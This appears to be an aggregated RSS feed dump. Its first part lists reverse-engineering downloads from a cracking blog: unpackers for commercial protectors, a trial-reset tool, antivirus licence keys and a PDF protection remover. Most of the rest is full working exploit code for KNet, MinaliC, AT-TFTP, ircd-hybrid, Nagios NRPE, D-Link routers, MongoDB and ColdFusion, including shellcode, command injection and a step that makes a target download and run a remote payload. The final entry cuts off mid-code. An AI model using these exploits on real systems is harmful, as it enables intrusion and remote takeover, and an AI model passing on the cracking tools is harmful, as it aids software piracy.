http://rdist.root.org/feed/ Sam Curry of RSA was nice enough to respond to my post. Here’s a few points that jumped out at me from what he wrote: RSA is in the process of fixing the downgrade attack that allows an attacker to choose PKCS #1 v1.5, even if the key was generated by a user who selected […]

==> OllyDbg 2.00.01 (Final)

http://reversengineering.wordpress.com/feed/ OllyDbg 2.0 is a 32-bit assembler-level analyzing Degugger with intuitive interface. It is especially useful if source code is not available or when you experience problems with your compiler. Requirements. Developed and tested mainly under Windows 2000 and Windows XP, but should work under any Windows version: 95, 98, ME, NT, 2000, XP, 2003 Server, [...]

==> PROTECTiON iD 6.4.0

http://reversengineering.wordpress.com/feed/ Features: - detection of every major PC ISO Game / Application protection - currently covers 475 detections, including win32/64 exe protectors & packers, .net protectors, dongles, licenses & installers - sector scanning CDs / DVDs for Copy Protections - files / folders can simply be drag & droped into pid - strong scanning routines allowing [...]

==> StrongOD 0.3.4.639

http://reversengineering.wordpress.com/feed/ Make your OllyDbg Strong! This plug-in provides three kinds of ways to initiate the process: 1, Normal – And the same manner as the original start, the STARTUPINFO inside unclean data 2, CreateAsUser – User with a mandate to initiate the process of the user, so that the process running under the purview of the [...]

==> Broken links ! لینکهایی که کار نمی کند

http://reversengineering.wordpress.com/feed/ hi dear friends tell me about broken links in this post i will find it on my system and after that i will try [...]

==> Trial Reset 4 Final

http://reversengineering.wordpress.com/feed/ Trial Reset 4 Final Tnx fly to his programmer http://rapidshare.com/files/409095074/Trial-Reset40Final.zip http://reversengineering.files.wordpress.com/2010/07/trial-reset40final-zip.jpg you know what to do;) Filed under: OTHER, TOOLS

==> The newest NOD32 keys with MVGM NOD32 Licence v1.0

http://reversengineering.wordpress.com/feed/ HI The newest NOD32 keys with MVGM NOD32 Licence v1.0 NOD32 [...]

==> TrialReset 4.0 Final (Public)

http://reversengineering.wordpress.com/feed/ hi to all i am here again thank u for ur supporting The small program for remove trial of apps. Works with all the widespread systems of protection. The interface is very simple: [...]

==> ODDragAttach 1.1

http://reversengineering.wordpress.com/feed/ Author Exile Description Choice is, it will add the window corresponding to the process of src and bin. Window, the process of selection, OD automatically minimize the window, select the target window, then maximize the window, OD. Note: Some versions of the OD program may cover an open button, can be changed according [...]

==> Attach Extended 0.1

http://reversengineering.wordpress.com/feed/ This is a really small plugin that I have written for improving attach feature of OllyDbg. With this plugin, you can attach to process by identifying its PID directly, not only selecting process list. In addition, you can find PID of process by dragging a small cursor on each window (This can be used on [...]

==> Mapimp 0.4

http://reversengineering.wordpress.com/feed/ Author takerZ Description This is an open source OllyDbg plugin which will help you to import map files exported by IDA or Dede. There are many plugins using which you can perform similar actions, but mapimp: - Recognizes debugged file segments and applies names correctly - Has an option to overwrite or skip [...]

==> Obsidium 1.4.x.x OEP Finder + IAT Repair v0.1

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/7203.a79ca10d2342f1b32333add72/Obsidium_1.4.x.x_OEP_Finder___IAT_Repair_v0.1.txt.html Author Pavka Posted in Scripts, TOOLS

==> MUltimate Assembler 1.2

http://reversengineering.wordpress.com/feed/ Author RaMMicHaeL A multi-line (dis)assembler tool, perfect for writing code caves. It supports: - labels and data (C-style string) - external jumps and calls. http://letitbit.net/download/6671.c63ed09074b57c49b4cd2067e/MUltimate_Assembler_v1.2.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> VMProtect 1.7 – 1.8 OEP Finder + Unpack Helper v1.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/2516.25addf1167522eb8602b67146/VMProtect_1.7___1.8_OEP_Finder___Unpack_Helper_v1.0.txt.html by LCF-AT Posted in Scripts, TOOLS

==> CodeDoctor 0.90

http://reversengineering.wordpress.com/feed/ Functions: 1) Deobfuscate Select instructions in disasm window and execute this command. It will try to clear the code from junk instructions. Example: Original: 00874372 57 PUSH EDI 00874373 BF 352AAF6A MOV EDI,6AAF2A35 00874378 81E7 0D152A41 AND EDI,412A150D 0087437E 81F7 01002A40 XOR EDI,402A0001 00874384 01FB ADD EBX,EDI 00874386 5F POP EDI Deobfuscated: 00874372 83C3 04 [...]

==> Themida + WinLicense 1.1.0.0 – 2.1.0.0 Dumper + IAT Repair + CodeEncrypt Repair v2.6.0

http://reversengineering.wordpress.com/feed/ by Quosego http://letitbit.net/download/5120.c5ff8c01bf87b5594de7f4fbc/Themida___WinLicense_1.1.0.0___2.1.0.0_Dumper___IAT_Repair___CodeEncrypt_Repair_v2.6.0.txt.html Posted in Scripts, TOOLS

==> Scripad 1.0 + ODBGScript 1.77.3

http://reversengineering.wordpress.com/feed/ ODbgScript is a plugin for OllyDbg, which is, in our opinion, the best application-mode debugger out there. One of the best features of this debugger is the plugin architecture which allows users to extend its functionality. ODbgScript is a plugin meant to let you automate OllyDbg by writing scripts in an assembly-like language. Many tasks [...]

==> StrongOD 0.2.6.415

http://reversengineering.wordpress.com/feed/ This will be a seperate download of StrongOD as of version 0.2.4.350 because – as strange as it sounds – the developer has protected it! This plugin will now require a key for it to run and be used. You can obtain a valid key by emailing: StrongODsafengine.com http://letitbit.net/download/9563.9f5459d00eca80b4993740279/StrongOD_v0.2.6.415.rar.html Posted in OLLY'S PLUGINS, TOOLS

==> PDF Protection Remover 3.0

http://reversengineering.wordpress.com/feed/ http://letitbit.net/download/8140.813d385e39b7bcbb34ccc58af/PDF_Protection_Remover_3.0___Patch_DJiNN.rar.html pass :www.2baksa.net Posted in TOOLS, Uncategorized

==> HOlly 0.2 Build 81

http://reversengineering.wordpress.com/feed/ This is my OllyDbg mod named HOlly. I will be constantly adding features as I require them or they are requested. Currently it only has a multiline assembler that needs some work but I would like some input. So if I could get some input on the following that would be great. http://letitbit.net/download/3997.d3730400452d29f3a615da1f7/HOlly_v0.2_Build_81.rar.html Posted in [...]

==> Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0

http://reversengineering.wordpress.com/feed/ Themida+WL1.1.0.0-2.1.0.0Dumper+IAT Repair+CodeEncryptRepair_v2.6.0 By [SND]quosego Hi all, It’s time to make a final stand. Oreans it’s your turn now. This package includes the following; WL.&.TM.VM.dumper.&.IAT.CodeEnc.Fixer.v2.6.0-SnD A script to unpack all known versions of Winlicense and Themida using any options. The script will unpack all known Themida and Winlicense applications using virtual machine antidump on Windows XP. [...]

==> KNet Web Server 1.04b - Stack Corruption BoF Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/perl # KNet Web Server Stack corruption BoF PoC # Written by Wireghoul - http://www.justanotherhacker.com # Date: 2013/04/11 # Version: 1.04b # Tested on: WinXP SP3 use IO::Socket::INET; $host = shift; $port = shift; print "KNet Web Server stack corruption BoF PoC - Wireghoul - http://www.justanotherhacker.com\n"; die "Usage $0 <host> <port>\n" unless $host && $port; $sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to $host:$port\n"; # Shellcode for calc.exe $shellcode= "\x89\xe2\xda\xd5\xd9\x72\xf4\x5d\x55\x59\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" . "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" . "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" . "\x42\x75\x4a\x49\x6b\x4c\x78\x68\x4e\x69\x45\x50\x73\x30" . "\x63\x30\x61\x70\x6e\x69\x78\x65\x75\x61\x39\x42\x62\x44" . "\x6c\x4b\x51\x42\x34\x70\x4e\x6b\x72\x72\x46\x6c\x4e\x6b" . "\x71\x42\x37\x64\x4e\x6b\x44\x32\x36\x48\x54\x4f\x4e\x57" . "\x53\x7a\x35\x76\x76\x51\x39\x6f\x44\x71\x4b\x70\x4e\x4c" . "\x77\x4c\x35\x31\x73\x4c\x47\x72\x64\x6c\x67\x50\x4a\x61" . "\x78\x4f\x54\x4d\x33\x31\x68\x47\x49\x72\x6a\x50\x73\x62" . "\x63\x67\x6c\x4b\x52\x72\x66\x70\x6e\x6b\x53\x72\x77\x4c" . "\x63\x31\x48\x50\x6e\x6b\x73\x70\x64\x38\x6e\x65\x69\x50" . "\x52\x54\x50\x4a\x65\x51\x48\x50\x56\x30\x4c\x4b\x70\x48" . "\x47\x68\x4c\x4b\x42\x78\x37\x50\x66\x61\x78\x53\x39\x73" . "\x77\x4c\x57\x39\x4c\x4b\x75\x64\x4c\x4b\x77\x71\x38\x56" . "\x70\x31\x59\x6f\x76\x51\x39\x50\x6c\x6c\x6f\x31\x6a\x6f" . "\x34\x4d\x53\x31\x78\x47\x45\x68\x79\x70\x42\x55\x6b\x44" . "\x77\x73\x61\x6d\x59\x68\x47\x4b\x51\x6d\x34\x64\x62\x55" . "\x4d\x32\x31\x48\x4c\x4b\x71\x48\x47\x54\x37\x71\x4e\x33" . "\x43\x56\x4e\x6b\x76\x6c\x32\x6b\x6c\x4b\x70\x58\x57\x6c" . "\x36\x61\x79\x43\x6e\x6b\x73\x34\x6e\x6b\x33\x31\x4a\x70" . "\x4b\x39\x73\x74\x34\x64\x54\x64\x63\x6b\x31\x4b\x65\x31" . "\x33\x69\x72\x7a\x70\x51\x39\x6f\x69\x70\x70\x58\x31\x4f" . "\x52\x7a\x6c\x4b\x36\x72\x58\x6b\x6b\x36\x73\x6d\x63\x5a" . "\x55\x51\x4c\x4d\x6b\x35\x6c\x79\x35\x50\x63\x30\x65\x50" . "\x66\x30\x35\x38\x46\x51\x6e\x6b\x50\x6f\x4c\x47\x79\x6f" . "\x6e\x35\x4d\x6b\x5a\x50\x68\x35\x6f\x52\x62\x76\x42\x48" . "\x6f\x56\x6d\x45\x4f\x4d\x6f\x6d\x4b\x4f\x7a\x75\x75\x6c" . "\x66\x66\x31\x6c\x74\x4a\x6f\x70\x79\x6b\x4b\x50\x52\x55" . "\x53\x35\x6d\x6b\x50\x47\x36\x73\x42\x52\x52\x4f\x72\x4a" . "\x45\x50\x72\x73\x6b\x4f\x6b\x65\x30\x63\x33\x51\x52\x4c" . "\x50\x63\x64\x6e\x51\x75\x42\x58\x45\x35\x57\x70\x41\x41"; $dist=1003-length($shellcode); $payload = "\x90"x$dist; # Distance to overwrite EIP $payload.=$shellcode; $payload.="\x90" x 8; #Spacer between EIP and shellcode $payload.= "\x53\x93\x42\x7e"; #Overwrite EIP with jmp esp $payload.="\x90\x90\x90\x90\xE9\xF4\xFC\xFF\xFF"; #stack padding + BP + Near jmp-300 $payload.=" / HTTP/1.0\r\n\r\n"; # Needs to be a valid HTTP request print $sock $payload;

==> AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss # Exploit Title: AT-TFTP 2.0 long filename stack based buffer overflow - DOS # Date: 12.04.2013 # Exploit Author: xis_one@STM Solutions # Vendor Homepage: http://www.alliedtelesis.com/ # Software Link: http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid=1081&p_created=981539150&p_topview=1 # Version: 2.0 # Tested on: Windows XP SP3 # # From 1.9 Remote Exec BOF disovered in 2006 by liuqx@nipc.org.cn to 2.0 Remote DOS BOF 2013 - no lesson learned. # Two variants: # # 1. SEH overwrite but no exception handler trigger (cookie on stack?) # 2. Read access violation (non-exploitable?) # # Still we can crash the server remotely. # #!/usr/bin/python import socket import sys host = '192.168.1.32' port = 69 nseh="\xCC\xCC\xCC\xCC" #seh handler overwritten at 261 byte of shellcode but to exception triggered to use it. seh="\x18\x0B\x27" # Breakpoint in no SafeSEH space in Windows XP SP3 payload="\xCC"*257 + nseh + seh + "\x00" + "3137" + "\x00" #payload to get access violation: #payload=("\x00\x01\x25\x32\x35\x25" #"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" #"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" #"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" #"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" #"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" #"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x25" #"\x35\x63\x2e\x2e\x25\x32\x35\x25\x35\x63\x2e\x2e\x25\x32\x35\x35" #"\x63\x65\x74\x63\x25\x32\x35\x35\x63\x68\x6f\x73\x74\x73\x00\x6e" #"\x00") buffer="\x00\x01"+ payload + "\x06" + "netascii" + "\x00" s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(buffer, (host, port))

==> MinaliC Webserver 2.0.0 - Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/env python # Exploit Title: MinaliC Webserver buffer overflow # Date: 12 Apr 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://minalic.sourceforge.net/ # Version: MinaliC Webserver 2.0.0 # Tested on: Windows XP Pro SP2, English # # Description: # Remote command execution by triggering a buffer overflow in the GET # request. # import socket import struct # 74 bytes calc.exe from http://code.google.com/p/win-exec-calc-shellcode/ shellcode = ( "\x31\xd2\x52\x68\x63\x61\x6c\x63\x89\xe6\x52\x56\x64\x8b\x72" + "\x30\x8b\x76\x0c\x8b\x76\x0c\xad\x8b\x30\x8b\x7e\x18\x8b\x5f" + "\x3c\x8b\x5c\x1f\x78\x8b\x74\x1f\x20\x01\xfe\x8b\x4c\x1f\x24" + "\x01\xf9\x0f\xb7\x2c\x51\x42\xad\x81\x3c\x07\x57\x69\x6e\x45" + "\x75\xf1\x8b\x74\x1f\x1c\x01\xfe\x03\x3c\xae\xff\xd7\xcc" ) # EIP at offset 245 when minalic.exe is in C:\minalic\bin # EBX points directly to the "Host:" value, so we put our shellcode there. # JMP EBX @ 0x7C955B47, NTDLL.DLL, Windows XP Pro SP2 English junk = "\x41" * 245 ret = struct.pack("<I", 0x7C955B47) host = "\x90" * 30 + shellcode + "\x90" * 31 buf = "GET /" + junk + ret + " HTTP/1.1\r\n" + "Host: " + host + "\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.37.132", 8080)) s.send(buf)

==> IRCD-Hybrid 8.0.5 - DoS Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/perl # ircd-hybrid remote denial of service exploit for CVE-2013-0238 # quick and dirty h4x by kingcope # tested against ircd-hybrid-8.0.5 centos6 # please modify below in case of buggy code. # enjoy! use Socket; srand(time()); $exploiting_nick = "hybExpl" . int(rand(10000)); sub connecttoserver() { $bool = "yes"; $iaddr = inet_aton($ircserver) || die("Failed to find host: $ircserver"); $paddr = sockaddr_in($ircport, $iaddr); $proto = getprotobyname('tcp'); socket(SOCK1, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket:$!"); connect(SOCK1, $paddr) || {$bool = "no"}; } sub usage() { print "usage: ircd-hybrid.pl <target> <port>\r\n"; exit; } $| = 1; print "------------------------------------------------------------------\r\nLets have fun!\r\n"; print "------------------------------------------------------------------\r\n"; if (!defined($ARGV[1])) { usage(); } $ircport = $ARGV[1]; $ircserver = $ARGV[0]; print "Connecting to $ircserver on port $ircport...\n"; connecttoserver(); if ($bool eq "no") { print "Connection refused.\r\n"; exit(0); } send(SOCK1,"NICK $exploiting_nick\r\n",0); send(SOCK1,"USER $exploiting_nick \"yahoo.com\" \"eu.hax.net\" :$exploiting_nick\r\n",0); while (<SOCK1>) { $line = $_; print $line; if ((index $line, " 005 ") ne -1) { goto logged_in; } if ((index $line, "PING") ne -1) { substr($line,1,1,"O"); send(SOCK1, $line, 0); } } logged_in: print " ok\r\n"; print "Sending buffers...\r\n"; $channelr = int(rand(10000)); send(SOCK1, "JOIN #h4xchan$channelr\r\n", 0); sleep(1); $k = 0; do { print $_; $k++; $crashnum = -1000009 - $k * 1000; send(SOCK1, "MODE #h4xchan$channelr +b *!*\@127.0.0.1/$crashnum\r\n", 0); } while(<SOCK1>); print "done\r\n";

==> Nagios Remote Plugin Executor Arbitrary Command Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## # require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution', 'Description' => %q{ The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands. }, 'Author' => [ 'Rudolph Pereir', # Vulnerability discovery 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module ], 'References' => [ [ 'CVE', '2013-1362' ], [ 'OSVDB', '90582'], [ 'BID', '58142'], [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability'] ], 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'perl python ruby bash telnet', # *_perl, *_python and *_ruby work if they are installed } }, 'Targets' => [ [ 'Nagios Remote Plugin Executor prior to 2.14', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 21 2013' )) register_options( [ Opt::RPORT(5666), OptEnum.new('NRPECMD', [ true, "NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg", 'check_procs', ['check_procs', 'check_users', 'check_load', 'check_disk'] ]), # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below OptBool.new('NRPESSL', [ true, "Use NRPE's Anonymous-Diffie-Hellman-variant SSL ", true]) ], self.class) end def send_message(message) packet = [ 2, # packet version 1, # packet type, 1 => query packet 0, # checksum, to be added later 0, # result code, discarded for query packet message, # the command and arguments 0 # padding ] packet[2] = Zlib::crc32(packet.pack("nnNna1024n")) # calculate the checksum begin self.sock.put(packet.pack("nnNna1024n")) #send the packet res = self.sock.get_once # get the response rescue ::EOFError => eof res = "" end return res.unpack("nnNnA1024n")[4] unless res.nil? end def setup @ssl_socket = nil @force_ssl = false super end def exploit if check != Exploit::CheckCode::Vulnerable fail_with(Exploit::Failure::NotFound, "Host does not support plugin command line arguments or is not accepting connections") end stage = "setsid nohup #{payload.encoded} & " stage = Rex::Text.encode_base64(stage) # NRPE will reject queries containing |`&><'\"\\[]{}; but not $() :) command = datastore['NRPECMD'] command << "!" command << "$($(rm -f /tmp/$$)" # Delete the file if it exists # need a way to write to a file without using redirection (>) # cant count on perl being on all linux hosts, use GNU Sed # TODO: Probably a better way to do this, some hosts may not have a /tmp command << "$(cp -f /etc/passwd /tmp/$$)" # populate the file with at least one line of text command << "$(sed 1i#{stage} -i /tmp/$$)" # prepend our stage to the file command << "$(sed q -i /tmp/$$)" # delete the rest of the lines after our stage command << "$(eval $(base64 -d /tmp/$$) )" # decode and execute our stage, base64 is in coreutils right? command << "$(kill -9 $$)" # kill check_procs parent (popen'd sh) so that it never executes command << "$(rm -f /tmp/$$))" # clean the file with the stage connect print_status("Sending request...") send_message(command) disconnect end def check print_status("Checking if remote NRPE supports command line arguments") begin # send query asking to run "fake_check" command with command substitution in arguments connect res = send_message("__fake_check!$()") # if nrpe is configured to support arguments and is not patched to add $() to # NASTY_META_CHARS then the service will return: # NRPE: Command '__fake_check' not defined if res =~ /not defined/ return Exploit::CheckCode::Vulnerable end # Otherwise the service will close the connection if it is configured to disable arguments rescue EOFError => eof return Exploit::CheckCode::Safe rescue Errno::ECONNRESET => reset unless datastore['NRPESSL'] or @force_ssl print_status("Retrying with ADH SSL") @force_ssl = true retry end return Exploit::CheckCode::Safe rescue => e return Exploit::CheckCode::Unknown end # TODO: patched version appears to go here return Exploit::CheckCode::Unknown end # NRPE uses unauthenticated Annonymous-Diffie-Hellman # setting the global SSL => true will break as we would be overlaying # an SSLSocket on another SSLSocket which hasnt completed its handshake def connect(global = true, opts={}) self.sock = super(global, opts) if datastore['NRPESSL'] or @force_ssl ctx = OpenSSL::SSL::SSLContext.new("TLSv1") ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE ctx.ciphers = "ADH" @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx) @ssl_socket.connect self.sock.extend(Rex::Socket::SslTcp) self.sock.sslsock = @ssl_socket self.sock.sslctx = ctx end return self.sock end def disconnect @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl super end

==> DLink DIR-645 / DIR-815 diagnostic.php Command Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'DLink DIR-645 / DIR-815 diagnostic.php Command Execution', 'Description' => %q{ Some DLink Routers are vulnerable to OS Command injection in the web interface. On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On version 1.03 authentication is needed in order to trigger the vulnerability, which has been fixed definitely on version 1.04. Other DLink products, like DIR-300 rev B and DIR-600, are also affected by this vulnerability. Not every device includes wget which we need for deploying our payload. On such devices you could use the cmd generic payload and try to start telnetd or execute other commands. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This module has been tested successfully on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the vulnerability. }, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '92144' ], [ 'BID', '58938' ], [ 'EDB', '24926' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-017' ] ], 'DisclosureDate' => 'Mar 05 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1 )) register_options( [ OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]) ], self.class) end def request(cmd,uri) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'vars_post' => { "act" => "ping", "dst" => "` #{cmd}`" } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) uri = '/diagnostic.php' if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") return end #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. #SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the DLink device to download #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) #not working if we send all command together -> lets take three requests cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Dlink device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") # # chmod # cmd = "chmod 777 /tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Dlink device to chmod #{downfile}") res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # # execute # cmd = "/tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Dlink device to execute #{downfile}") res = request(cmd,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end

==> MongoDB nativeHelper.apply Remote Code Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #Title: MongoDB nativeHelper.apply Remote Code Execution #Author: agixid http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/ #Software Link: http://fastdl.mongodb.org/linux/mongodb-linux-i686-2.2.3.tgz #Version: 2.2.3 The following PoC exploits the "nativeHelper" feature in the spidermonkey mongodb implementation. the NativeFunction "func" come from "x" javascript object and then is called without any check: db.my_collection.find({'$where':'shellcode=unescape("METASPLOIT JS GENERATED SHELLCODE"); sizechunk=0x1000; chunk=""; for(i=0;i<sizechunk;i++){ chunk+=unescape("%u9090%u9090"); } chunk=chunk.substring(0,(sizechunk-shellcode.length)); testarray=new Array(); for(i=0;i<25000;i++){ testarray[i]=chunk+shellcode; } ropchain=unescape("%uf768%u0816%u0c0c%u0c0c%u0000%u0c0c%u1000%u0000%u0007%u0000%u0031%u0000%uffff%uffff%u0000%u0000"); sizechunk2=0x1000; chunk2=""; for(i=0;i<sizechunk2;i++){ chunk2+=unescape("%u5a70%u0805"); } chunk2=chunk2.substring(0,(sizechunk2-ropchain.length)); testarray2=new Array(); for(i=0;i<25000;i++){ testarray2[i]=chunk2+ropchain; } nativeHelper.apply({"x" : 0x836e204}, ["A"+"\x26\x18\x35\x08"+"MongoSploit!"+"\x58\x71\x45\x08"+"sthack is a nice place to

==> Adobe ColdFusion APSB13-03 Remote Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'digest/sha1' require 'openssl' class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe ColdFusion APSB13-03', 'Description' => %q{ This module exploits a pile of vulnerabilities in Adobe ColdFusion APSB13-03: * CVE-2013-0625: arbitrary command execution in scheduleedit.cfm (9.x only) * CVE-2013-0629: directory traversal * CVE-2013-0632: authentication bypass }, 'Author' => [ 'Jon Hart <jon_hart[at]rapid7.com', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2013-0625'], [ 'CVE', '2013-0629'], # we don't actually exploit this, as this is the backdoor # dropped by malware exploiting the other vulnerabilities [ 'CVE', '2013-0631'], [ 'CVE', '2013-0632'], ], 'Targets' => [ ['Automatic Targeting', { 'auto' => true }], [ 'Universal CMD', { 'Arch' => ARCH_CMD, 'Platform' => ['unix', 'win', 'linux'] } ] ], 'DefaultTarget' => 1, 'Privileged' => true, 'Platform' => [ 'win', 'linux' ], 'DisclosureDate' => 'Jan 15 2013')) register_options( [ Opt::RPORT(80), OptString.new('USERNAME', [ false, 'The username to authenticate as' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), OptBool.new('USERDS', [ true, 'Authenticate with RDS credentials', true ]), OptString.new('CMD', [ false, 'Command to run rather than dropping a payload', '' ]), ], self.class) register_advanced_options( [ OptBool.new('DELETE_TASK', [ true, 'Delete scheduled task when done', true ]), ], self.class) end def check exploitable = 0 exploitable += 1 if check_cve_2013_0629 exploitable += 1 if check_cve_2013_0632 exploitable > 0 ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe end # Login any way possible, returning the cookies if 